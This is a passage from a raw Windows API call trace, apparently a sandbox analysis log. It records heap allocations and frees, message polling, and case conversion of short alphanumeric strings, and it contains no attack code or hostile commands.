wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.362] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.362] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.363] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0266.363] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.363] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0266.363] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.363] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.363] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.363] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.364] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.364] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.364] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.364] CryptDestroyKey (hKey=0xaa5860) returned 1 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.366] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.367] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0266.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0266.368] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.368] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0266.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.368] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.369] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.369] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.369] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.369] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.369] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.370] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.370] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0266.372] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.372] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0266.373] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.373] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.373] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.373] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.373] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.374] HeapFree (in: hHeap=0x25c0000, 